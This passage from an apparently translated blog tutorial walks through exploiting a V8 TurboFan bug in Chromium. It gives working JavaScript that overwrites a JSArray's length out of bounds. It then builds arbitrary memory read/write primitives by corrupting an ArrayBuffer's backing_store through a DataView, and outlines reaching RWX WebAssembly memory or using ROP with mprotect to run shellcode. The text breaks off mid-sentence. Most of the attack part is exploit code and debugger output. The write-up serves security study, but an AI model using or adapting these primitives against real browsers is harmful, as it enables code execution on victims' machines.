class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(arr[t]);</span><br><span class="line">    %<span class="title class_">DebugPrint</span>(arr);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">f</span>(<span class="number">1</span>);</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="title function_">f</span>(<span class="number">1</span>);</span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure><p>The final output is <code>1.4853970537e-313</code>. Reinterpreting that value as an integer in gdb gives exactly <code>7</code> (a Smi, stored in the upper 32 bits), which means we can now modify the JSArray's length.</p><p>Let's try it:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> oob_arr = [];</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr = [<span class="number">1.0</span>, <span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>, <span class="number">1.4</span>, <span class="number">1.5</span>, <span 
class="number">1.6</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740990</span>;</span><br><span class="line">    t *= <span class="number">2</span>;</span><br><span class="line">    t += <span class="number">2</span>;</span><br><span class="line">    <span class="comment">// Write smi(1024) into the JSArray's length field</span></span><br><span class="line">    oob_arr[t] = <span class="number">2.1729236899484389e-311</span>; <span class="comment">// 1024.f2smi</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Try to trigger optimization</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; i++)</span><br><span class="line">    <span class="title function_">opt_me</span>(<span class="number">1</span>);</span><br><span class="line"><span class="comment">// Try an out-of-bounds read</span></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(oob_arr.<span class="property">length</span>);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(oob_arr[<span class="number">100</span>]);</span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure><p>As we can see, <strong>the out-of-bounds read/write succeeds</strong>!</p><p><img src="/2021/01/v8-turboFan/debugprint5.png" alt="img"></p><p>Trying it in the attached chromium build shows that it works there as well:</p><p><img src="/2021/01/v8-turboFan/chromium_output1.png" alt="img"></p><p>However, v8 and chromium print different values, so after debugging and writing the JS against d8 we still need to verify it in
chromium.</p><blockquote><p>One caveat: when an array is read or written inside a function optimized by TurboFan, the bounds check does not go through the familiar <code>Runtime_KeyedLoadIC_Miss</code> function, so out-of-bounds operations are best performed outside the optimized function.</p></blockquote></li><li><p>We now have a wide-range out-of-bounds read <strong>past the end</strong> of the JSArray, but that is clearly not enough: a JSArray can only reach at most <code>0x40000000</code> bytes <strong>past its end</strong>, so the range is limited.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/objects/fixed-array.h</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> V8_HOST_ARCH_32_BIT</span></span><br><span class="line">  <span class="type">static</span> <span class="type">const</span> <span class="type">int</span> kMaxSize = <span class="number">512</span> * MB;</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">  <span class="type">static</span> <span class="type">const</span> <span class="type">int</span> kMaxSize = <span class="number">1024</span> * MB;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span>  <span class="comment">// V8_HOST_ARCH_32_BIT</span></span></span><br></pre></td></tr></table></figure><p>It might seem that we could declare another JSArray and overwrite its elements pointer out of bounds to get arbitrary address read/write. In practice this does not work: every elements object carries its own map pointer, so to read an arbitrary address by redirecting elements we would also have to forge a fake map at the target address, which is usually not possible.</p><p>So next we introduce a type that is commonly used in exploits: <strong>ArrayBuffer</strong>.</p></li></ul><h5 id="2-ArrayBuffer">2) ArrayBuffer</h5><ul><li><p><code>ArrayBuffer</code> is an object that shows up often in exploits. It represents a generic, fixed-length raw binary data buffer. Its contents normally cannot be manipulated directly; instead we go through a typed array object (JSTypedArray) or a <code>DataView</code> object, which present the data in the buffer in a specific format and read or write the buffer's contents through that format.<br><img src="/2021/01/v8-turboFan/console_print1.png" alt="img"></p><p>The buffer memory of an ArrayBuffer is the
<strong>backing_store</strong> of the JSArrayBuffer object in v8.</p></li><li><p>Note that an ArrayBuffer also has its own elements. The elements and the backing_store are <strong>not the same thing</strong>: elements is an object on the V8 heap, whereas the backing_store is just a plain chunk of heap memory. Modifying the data in one therefore never affects the data in the other.</p><p>Here is a simple JS test:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">buffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x400</span>);</span><br><span class="line">int = <span class="keyword">new</span> <span class="title class_">Int32Array</span>(buffer);</span><br><span class="line">int[<span class="number">2</span>] = <span class="number">1024</span>;</span><br><span class="line">buffer[<span class="number">1</span>] = <span class="number">0x200</span>;</span><br><span class="line">%<span class="title class_">DebugPrint</span>(buffer);</span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure><p>Output in the browser:</p><p><img src="/2021/01/v8-turboFan/console_print2.png" alt="img"></p><p>Address information printed in gdb:</p><p><img src="/2021/01/v8-turboFan/debugprint11.png" alt="img"></p></li><li><p>From this it is easy to infer that <strong>every JSTypedArray reads and writes the ArrayBuffer's backing_store</strong>. So if we can set an ArrayBuffer's backing_store to an arbitrary value, we can read and write arbitrary addresses through a JSTypedArray.</p><blockquote><p>JSTypedArray includes, among others, Int32Array, BigInt64Array, Float32Array and Float64Array. DataView is not a typed array, but it is a view over the same backing_store.</p></blockquote><p>Below I use a <code>DataView</code> object to read and write the ArrayBuffer's backing_store. To confirm that DataView really modifies the heap memory pointed to by the ArrayBuffer's backing_store, here is the corresponding code:</p><blockquote><p>Note: the following code comes from <code>v8/src/builtins/data-view.tq</code> and is written in V8
<code>Torque</code>. Its syntax resembles <code>TypeScript</code>, and it is designed to make high-level, semantically rich V8 implementation code easier to express. The Torque compiler converts these snippets into efficient assembly code using the CodeStubAssembler.</p><p>For more about the language, see the <a href="https://v8.dev/docs/torque">V8 Torque user manual</a>.</p></blockquote><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span 
class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/builtins/data-view.tq</span></span><br><span class="line">javascript builtin <span class="title class_">DataViewPrototypeSetFloat64</span>(</span><br><span class="line">    <span class="attr">context</span>: <span class="title class_">Context</span>, <span class="attr">receiver</span>: <span class="title class_">Object</span>, ...<span class="variable language_">arguments</span>): <span class="title class_">Object</span> &#123;</span><br><span class="line">      <span class="keyword">let</span> <span class="attr">offset</span>: <span class="title class_">Object</span> = <span class="variable language_">arguments</span>.<span class="property">length</span> &gt; <span class="number">0</span> ?</span><br><span class="line">          <span class="variable language_">arguments</span>[<span class="number">0</span>] :</span><br><span class="line">          <span class="title class_">Undefined</span>;</span><br><span class="line">      <span class="keyword">let</span> value : <span class="title class_">Object</span> = <span class="variable language_">arguments</span>.<span class="property">length</span> &gt; <span class="number">1</span> ?</span><br><span class="line">          <span class="variable language_">arguments</span>[<span class="number">1</span>] :</span><br><span class="line">          <span class="title class_">Undefined</span>;</span><br><span class="line">      <span class="keyword">let</span> is_little_endian 
: <span class="title class_">Object</span> = <span class="variable language_">arguments</span>.<span class="property">length</span> &gt; <span class="number">2</span> ?</span><br><span class="line">          <span class="variable language_">arguments</span>[<span class="number">2</span>] :</span><br><span class="line">          <span class="title class_">Undefined</span>;</span><br><span class="line">      <span class="comment">// After the bounds check, continue by calling DataViewSet.</span></span><br><span class="line">      <span class="keyword">return</span> <span class="title class_">DataViewSet</span>(context, receiver, offset, value,</span><br><span class="line">                         is_little_endian, <span class="title class_">FLOAT64</span>_ELEMENTS);</span><br><span class="line">    &#125;</span><br><span class="line">macro <span class="title class_">DataViewSet</span>(<span class="attr">context</span>: <span class="title class_">Context</span>,</span><br><span class="line">                    <span class="attr">receiver</span>: <span class="title class_">Object</span>,</span><br><span class="line">                    <span class="attr">offset</span>: <span class="title class_">Object</span>,</span><br><span class="line">                    <span class="attr">value</span>: <span class="title class_">Object</span>,</span><br><span class="line">                    <span class="attr">requested_little_endian</span>: <span class="title class_">Object</span>,</span><br><span class="line">                    <span class="attr">kind</span>: constexpr <span class="title class_">ElementsKind</span>): <span class="title class_">Object</span> &#123;</span><br><span class="line">    <span class="comment">// Get the current DataView object</span></span><br><span class="line">    <span class="keyword">let</span> <span class="attr">data_view</span>: <span class="title class_">JSDataView</span> = <span class="title class_">ValidateDataView</span>(</span><br><span class="line">        context, receiver, <span 
class="title class_">MakeDataViewSetterNameString</span>(kind));</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">let</span> <span class="attr">littleEndian</span>: bool = <span class="title class_">ToBoolean</span>(requested_little_endian);</span><br><span class="line">    <span class="comment">// Get the buffer of the current DataView, i.e. its ArrayBuffer</span></span><br><span class="line">    <span class="keyword">let</span> <span class="attr">buffer</span>: <span class="title class_">JSArrayBuffer</span> = data_view.<span class="property">buffer</span>;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="keyword">let</span> <span class="attr">double_value</span>: float64 = <span class="title class_">ChangeNumberToFloat64</span>(num_value);</span><br><span class="line"></span><br><span class="line">      <span class="keyword">if</span> <span class="title function_">constexpr</span> (kind == <span class="title class_">UINT8</span>_ELEMENTS || kind == <span class="title class_">INT8</span>_ELEMENTS) &#123;</span><br><span class="line">         <span class="comment">// ...</span></span><br><span class="line">      &#125;</span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> <span class="title function_">constexpr</span> (kind == <span class="title class_">FLOAT64</span>_ELEMENTS) &#123;</span><br><span class="line">      <span class="comment">// Split the 64-bit value into two 32-bit words and write them to the buffer.</span></span><br><span class="line">        <span class="keyword">let</span> <span class="attr">low_word</span>: uint32 = <span class="title class_">Float64ExtractLowWord32</span>(double_value);</span><br><span class="line">        <span class="keyword">let</span> <span 
class="attr">high_word</span>: uint32 = <span class="title class_">Float64ExtractHighWord32</span>(double_value);</span><br><span class="line">        <span class="title class_">StoreDataView64</span>(buffer, bufferIndex, low_word, high_word,</span><br><span class="line">                        littleEndian);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="title class_">Undefined</span>;</span><br><span class="line">  &#125;</span><br><span class="line">macro <span class="title class_">StoreDataView64</span>(<span class="attr">buffer</span>: <span class="title class_">JSArrayBuffer</span>, <span class="attr">offset</span>: intptr,</span><br><span class="line">                        <span class="attr">low_word</span>: uint32, <span class="attr">high_word</span>: uint32,</span><br><span class="line">                        <span class="attr">requested_little_endian</span>: bool) &#123;</span><br><span class="line">    <span class="comment">// Get the destination address; this is the ArrayBuffer's backing_store.</span></span><br><span class="line">    <span class="comment">// This matches what we expected.</span></span><br><span class="line">    <span class="keyword">let</span> <span class="attr">data_pointer</span>: <span class="title class_">RawPtr</span> = buffer.<span class="property">backing_store</span>;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">if</span> (requested_little_endian) &#123;</span><br><span class="line">      <span class="comment">// Write the value into the backing_store.</span></span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset, b0);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">1</span>, b1);</span><br><span class="line">      <span class="title 
class_">StoreWord8</span>(data_pointer, offset + <span class="number">2</span>, b2);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">3</span>, b3);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">4</span>, b4);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">5</span>, b5);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">6</span>, b6);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">7</span>, b7);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure></li><li><p>So we can now try to build arbitrary address read/write primitives.</p></li></ul><h5 id="3-任意地址读写原语">3) Arbitrary address read/write primitives</h5><ul><li><p>Based on the analysis above, the primitives can be built in the following steps:</p><ul><li>Use the OOB access to overwrite the length of the JSArray itself, gaining wide-range out-of-bounds read/write.</li><li>Try to <strong>allocate an ArrayBuffer in the same memory segment as the OOB JSArray</strong>, so that the OOB access can overwrite the ArrayBuffer's backing_store.</li><li>Attach a DataView object to the ArrayBuffer. Once the JSArray has overwritten the ArrayBuffer's backing_store out of bounds, the target memory can be read and written through the DataView.</li></ul></li><li><p>Note that the relative offset between the FixedDoubleArray and the backing_store is best not <strong>hard-coded</strong>. If another object later has to be allocated in the same memory segment, the original offset will very likely become invalid; avoiding hard-coding also <strong>makes it easier to port the exp from v8 to chromium</strong>.</p><p>Without a hard-coded offset, however, using a for loop to <strong>read the array out of bounds repeatedly</strong> triggers a <code>CSA_ASSERT</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/code-stub-assembler.cc</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// in TNode&lt;Float64T&gt; CodeStubAssembler::LoadFixedDoubleArrayElement</span></span><br><span class="line"><span class="built_in">CSA_ASSERT</span>(<span class="keyword">this</span>, <span class="built_in">IsOffsetInBounds</span>(</span><br><span class="line">    offset, <span class="built_in">LoadAndUntagFixedArrayBaseLength</span>(object),</span><br><span class="line">    FixedDoubleArray::kHeaderSize, HOLEY_DOUBLE_ELEMENTS));</span><br></pre></td></tr></table></figure><p>Because <code>CSA_ASSERT</code> only takes effect in Debug builds of v8, we can likewise comment out this statement and rebuild; this does not affect writing the exp for chromium.</p></li><li><p>Putting it all together, the final <strong>arbitrary address read/write primitives</strong> are as follows:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span 
class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">log</span>(<span class="params">msg</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(msg);</span><br><span class="line">    <span class="comment">// var elem = document.getElementById(&quot;log&quot;);</span></span><br><span 
class="line">    <span class="comment">// elem.innerText += &#x27;[+] &#x27; + msg + &#x27;\n&#x27;;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- Primitives for converting between 64-bit integers and 64-bit floats -- *******/</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> transformBuffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">8</span>);</span><br><span class="line"><span class="keyword">var</span> bigIntArray = <span class="keyword">new</span> <span class="title class_">BigInt64Array</span>(transformBuffer);</span><br><span class="line"><span class="keyword">var</span> floatArray = <span class="keyword">new</span> <span class="title class_">Float64Array</span>(transformBuffer);</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">Int64ToFloat64</span>(<span class="params">int</span>)</span><br><span class="line">&#123;</span><br><span class="line">    bigIntArray[<span class="number">0</span>] = <span class="title class_">BigInt</span>(int);</span><br><span class="line">    <span class="keyword">return</span> floatArray[<span class="number">0</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">Float64ToInt64</span>(<span class="params">float</span>)</span><br><span class="line">&#123;</span><br><span class="line">    floatArray[<span class="number">0</span>] = float;</span><br><span class="line">    <span class="keyword">return</span> bigIntArray[<span class="number">0</span>];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- Overwriting the JSArray length -- *******/</span></span><br><span class="line"><span class="keyword">var</span> oob_arr = [];</span><br><span class="line"><span 
class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr = [<span class="number">1.0</span>, <span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>, <span class="number">1.4</span>, <span class="number">1.5</span>, <span class="number">1.6</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740990</span>;</span><br><span class="line">    t *= <span class="number">2</span>;</span><br><span class="line">    t += <span class="number">2</span>;</span><br><span class="line">    oob_arr[t] = <span class="number">2.1729236899484389e-311</span>; <span class="comment">// 1024.f2smi</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Try to trigger TurboFan so that the JSArray length gets overwritten</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; i++)</span><br><span class="line">    <span class="title function_">opt_me</span>(<span class="number">1</span>);</span><br><span class="line"><span class="comment">// Simple sanity check</span></span><br><span class="line"><span class="keyword">if</span>(oob_arr[<span class="number">1023</span>] == <span class="literal">undefined</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;OOB Fail!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="title function_">log</span>(<span 
class="string">&quot;[+] oob_arr.length == &quot;</span> + oob_arr.<span class="property">length</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- Arbitrary address read/write primitives -- *******/</span></span><br><span class="line"><span class="keyword">var</span> array_buffer;</span><br><span class="line">array_buffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x233</span>);</span><br><span class="line">data_view = <span class="keyword">new</span> <span class="title class_">DataView</span>(array_buffer);</span><br><span class="line">backing_store_offset = -<span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Locate backing_store_offset</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x400</span>; i++)</span><br><span class="line">&#123;   </span><br><span class="line">    <span class="comment">// smi(0x233) == 0x0000023300000000</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="title class_">Float64ToInt64</span>(oob_arr[i]) == <span class="number">0x0000023300000000</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        backing_store_offset = i + <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Check that the backing_store was actually found</span></span><br><span class="line"><span class="keyword">if</span>(backing_store_offset == -<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;backing_store is not found!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span 
class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] backing_store offset: &quot;</span> + backing_store_offset);</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">read_8bytes</span>(<span class="params">addr</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span><br><span class="line">    <span class="keyword">return</span> data_view.<span class="title function_">getBigInt64</span>(<span class="number">0</span>, <span class="literal">true</span>); <span class="comment">// true selects little-endian</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">write_8bytes</span>(<span class="params">addr, data</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span><br><span class="line">    data_view.<span class="title function_">setBigInt64</span>(<span class="number">0</span>, <span class="title class_">BigInt</span>(data), <span class="literal">true</span>); <span class="comment">// true selects little-endian</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- try arbitrary read/write -- *******/</span></span><br><span class="line"><span class="comment">// Try reading memory at address 0xdeaddead</span></span><br><span class="line"><span class="title function_">read_8bytes</span>(<span class="number">0xdeaddead</span>);</span><br><span class="line"><span class="comment">// Try writing memory at address 0xdeaddead</span></span><br><span class="line"><span class="title function_">write_8bytes</span>(<span class="number">0xdeaddead</span>, <span 
class="number">0x89abcdef</span>);</span><br></pre></td></tr></table></figure><p>The test results are as follows:</p><blockquote><p>Note: each run can test either the arbitrary read or the arbitrary write, not both at once.</p></blockquote><ul><li><p>The target data can be written to the target address:</p><p><img src="/2021/01/v8-turboFan/debugprint12.png" alt="img"></p></li><li><p>Data can be read from the target address:</p><p><img src="/2021/01/v8-turboFan/debugprint13.png" alt="img"></p></li></ul></li></ul><h4 id="c-泄露-RWX-地址">c. Leaking the RWX address</h4><ul><li><p>Because v8 has <a href="https://source.chromium.org/chromium/v8/v8.git/+/dde25872f58951bb0148cf43d6a504ab2f280485:src/flag-definitions.h;l=717">stopped</a> placing <strong>JIT-compiled JSFunctions</strong> in RWX memory, we have to find another way. The exploitation techniques I found fall into two approaches:</p><ol><li><p>Write the JSFunction of Array into memory and leak it, then go on to leak the code pointer inside that JSFunction. Since this Code pointer points into the chromium binary, we can load the binary into IDA to compute relative offsets and obtain <strong>code base address =&gt; GOT entry =&gt; libc base address =&gt; environ pointer</strong>, which yields a writable stack address and the address of <code>mprotect</code>.</p><p>Then write the shellcode onto the stack, use ROP to call mprotect to make it executable, and finally jump to it, which runs the shellcode.</p><blockquote><p>This approach comes from Sakura; see the fourth reference link.</p></blockquote></li><li><p>Besides JS, v8 also compiles WebAssembly (wasm) code, and wasm modules still <a href="https://source.chromium.org/chromium/chromium/src/+/1bc5adc2c0e057fb0fb91afa0c534dada924f90e:v8/src/flags/flag-definitions.h;l=790">use</a> RWX memory as of this writing, so we can try writing the shellcode into that memory and executing it, although this approach is somewhat more involved.</p><blockquote><p>This approach comes from doar-e; see the first reference link.</p></blockquote></li></ol><p>The first approach is very direct and should not be hard to carry out. For learning purposes, we therefore choose the second approach and study how WebAssembly can be exploited.</p></li><li><p>The article <a href="https://www.anquanke.com/post/id/150923">浅谈如何逆向分析WebAssembly二进制文件 - 安全客</a> shows a simple way to use wasm, through which we can obtain a Wasm JSFunction:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// wasm binary for the C++ code `void func() &#123;&#125;`</span></span><br><span class="line"><span class="keyword">let</span> wasmCode = <span class="keyword">new</span> 
<span class="title class_">Uint8Array</span>([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,<span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span 
class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">10</span>,<span class="number">136</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">11</span>]);</span><br><span class="line"><span class="keyword">let</span> m = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(<span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasmCode),&#123;&#125;);</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunction</span> = m.<span class="property">exports</span>.<span class="property">func</span>;</span><br></pre></td></tr></table></figure></li><li><p>Given a Wasm JSFunction, we can reach the address of the RWX segment by following this path:</p><blockquote><p>The path is a little long: JSFunction -&gt; SharedFunctionInfo -&gt; 